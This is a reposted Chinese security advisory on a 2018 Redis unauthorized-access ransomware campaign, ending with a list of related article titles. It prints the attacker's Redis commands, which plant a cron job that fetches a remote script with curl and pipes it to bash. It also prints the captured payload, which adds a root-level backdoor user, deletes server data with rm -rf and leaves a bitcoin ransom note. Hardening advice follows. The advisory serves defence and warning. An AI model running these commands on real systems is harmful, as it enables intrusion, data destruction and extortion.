【轉載】Redis最新漏洞,刪庫勒索+跑路!!!
9月10日下午15:06開始,阿里雲官方首次發現一起規模化利用Redis 未授權訪問漏洞進行加密貨幣勒索的事件,阿里雲上防禦系統在攻擊開始的10s內就已開啟全網攔截。
與以往的只是通過算力竊取進行挖礦的攻擊事件不同,此次攻擊者在攻擊之初就是以勒索錢財作為第一目的的,攻擊者無懼暴露,非常猖狂。直接刪除資料、加密資料也意味著攻擊者與防禦者之間已經沒有緩衝地帶,基本的攻防對抗將是赤裸裸的一場刺刀戰。
該高危漏洞早在半年前阿里雲就釋出過預警,但是還是有不少使用者並未進行修改加以重視。阿里雲安全專家提醒使用者參考文末方法,儘快完成漏洞修復或部署防禦,一旦被攻擊成功,整個伺服器的程式和資料都將會被刪除!且很難恢復。
Redis應用簡介
Redis是一個開源的使用ANSI C語言編寫、支援網路、可基於記憶體亦可持久化的日誌型、Key-Value資料庫,並提供多種語言的API。從2010年3月15日起,Redis的開發工作由VMware主持。從2013年5月開始,Redis的開發由Pivotal贊助。
Redis漏洞原理
作為一個記憶體資料庫,redis 可通過週期性配置或者手動執行save命令,將快取中的值寫入到磁碟檔案中。如果redis程式許可權足夠,攻擊者就可以利用它的未授權漏洞來寫入計劃任務、ssh登入金鑰、webshell 等等,以達到執行任意指令的目的。
自2017年12月以來,由於該漏洞已經被大規模利用,如DDG等多個殭屍網路都以該漏洞為目標進行迅速的繁殖和佔領算力,並且各大殭屍網路間都會互相刪除彼此來保證自己對機器算力的掌握。
攻擊過程說明
● 首先攻擊者通過事先的掃描踩點,發現了這些公網可訪問並且未設定密碼的機器
● 攻擊者嘗試連線這些機器,並且執行如下程式碼:
config set dir /var/spool/cron/
config set dbfilename root
config 1 */10 * * * * curl -shttp://103.224.80.52/butterfly.sh | bash
save
通過上述指令,將下載指令碼:http://103.224.80.52/butterfly.sh並將該指令碼寫入到計劃任務中,由計劃任務啟動執行。
由於在分析時,攻擊者感知到我們的反向探查,已經將該指令碼下線。但我們的蜜罐成功抓取到了該指令碼如下:
#!/bin/bash
#*butterfly*
exportPATH=$PATH:/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin:/usr/local/sbin
userdel -r redis
useradd -o -u 0 -g 0 redis &>/dev/null
echo "abcd-1234-!" |passwd--stdin redis &>/dev/null
rm -rf /root/*
rm -rf /home/*
rm -rf /opt/*
rm -rf /data/*
rm -rf /data*
mkdir -p /data
echo -e "
Warning!
Your File andDataBase is downloaded and backed up on our secured servers. To recover yourlost data : Send 0.6 BTC to our BitCoin Address and Contact us by eMail withyour server IP Address and a Proof of Payment. Any eMail without your server IPAddress and a Proof of Payment together will be ignored. We will drop thebackup after 24 hours. You are welcome!
Mail:dbsecuritys@protonmail.com
BitCoin:3JPaDCoRnQatEEDoY59KtgF38GZiL5Kiny
" > /root/Warning.txt
chmod +x /root/Warning.txt
cp /root/Warning.txt /Warning.txt
cp /root/Warning.txt /data/Warning.txt
echo -e "
Warning!
Your File andDataBase is downloaded and backed up on our secured servers. To recover yourlost data : Send 0.6 BTC to our BitCoin Address and Contact us by eMail withyour server IP Address and a Proof of Payment. Any eMail without your server IPAddress and a Proof of Payment together will be ignored. We will drop thebackup after 24 hours. You are
● 攻擊者要求給地址:3JPaDCoRnQatEEDoY59KtgF38GZiL5Kiny 傳送0.6個比特幣,否則將在24小時之內刪除資料備份。
● 但是從這個指令碼中可以明顯看出,攻擊者根本沒有進行備份,即使被攻擊者給了錢,也是要不回資料的。
截止到9月10日晚8點為止,該地址共收到了0.6個比特幣的轉賬,並且都是在今日進行傳送的,已經有受害者開始轉賬了。
**# 安全建議
● 通過安全組限制對公網對Redis等服務的訪問
● 通過修改redis.conf配置檔案,增加密碼認證,並隱藏重要命令
● 以低許可權執行redis服務等**
原文釋出時間:2018年09月10日
本文作者:
本文來自雲棲社群合作伙伴“阿里雲安全”,瞭解相關資訊可以關注“阿里雲安全”。
相關文章
- Redis勒索事件爆發,如何避免從刪庫到跑路?Redis事件
- Linux刪庫跑路Linux
- 《MySQL——從刪庫到跑路》阿里架構師分享刪庫跑路救命策略MySql阿里架構
- 我刪庫跑路失敗了
- 如何刪庫以後不跑路
- 程式設計師刪庫跑路了?程式設計師
- 看完這篇不在擔心刪庫跑路
- 刪庫跑路?你應該看看雲資料庫資料庫
- 刪庫後,除了跑路還能怎麼辦?
- 從刪庫到跑路,DBA 如何防止被淘汰?
- 寫了Bug,誤執行 rm -fr /*,我刪刪刪刪庫了,要跑路嗎?
- 又一程式設計師刪庫跑路了程式設計師
- 刪庫不跑路-詳解MySQL資料恢復MySql資料恢復
- MySQL DBA如何從刪庫跑路到carry全場MySql
- 坑坑坑,刪庫跑路的多種隱含命令
- 谷歌修復Chrome零日漏洞;微盟員工刪庫跑路;ATM機Win 7系統崩潰谷歌Chrome
- 伺服器被黑了,被刪庫勒索伺服器
- 京東到家程式設計師離職當天刪庫跑路程式設計師
- 無需跑路,GitLab 刪庫事件的借鑑意義Gitlab事件
- 刪庫了不用跑路!binlog恢復資料實操
- 同事刪庫跑路後,我連表名都不能修改了?
- 刪庫到跑路?還得看這篇Redis資料庫持久化與企業容災備份恢復實戰指南Redis資料庫持久化
- “刪庫跑路”重現江湖,技術和制度如何保障資料安全?
- Ewebeditor最新漏洞及漏洞大全Web
- Redis 與 memcache(轉載)Redis
- redis漏洞利用Redis
- redis 入門系列(轉載)Redis
- Oracle最新補丁包修101個漏洞(轉)Oracle
- 刪庫跑路升級版,著名大廠員工離職為報復公司,直接刪虛擬機器!虛擬機
- 刪庫跑路又發生了,企業應該如何杜絕此類事件發生?事件
- 堡壘機和防火牆的區別是什麼?能防刪庫跑路嗎?防火牆
- The Data Way Vol.3|做到最後只能刪庫跑路?DBA 能做的還有很多
- “刪庫跑路”這件事情真的發生了 ,還是技術總監乾的!
- 世界最大漏洞資料庫釋出最新研究報告資料庫
- 【轉載】Oracle Data Guard 主庫 歸檔檔案 刪除策略Oracle
- 【轉載】Oracle Data Guard 備庫 歸檔檔案 刪除指令碼Oracle指令碼
- 【漏洞預警】Redis 頻發高危漏洞Redis
- 勒索刪庫 仍可恢復|你可以相信Cyber Recovery的五個理由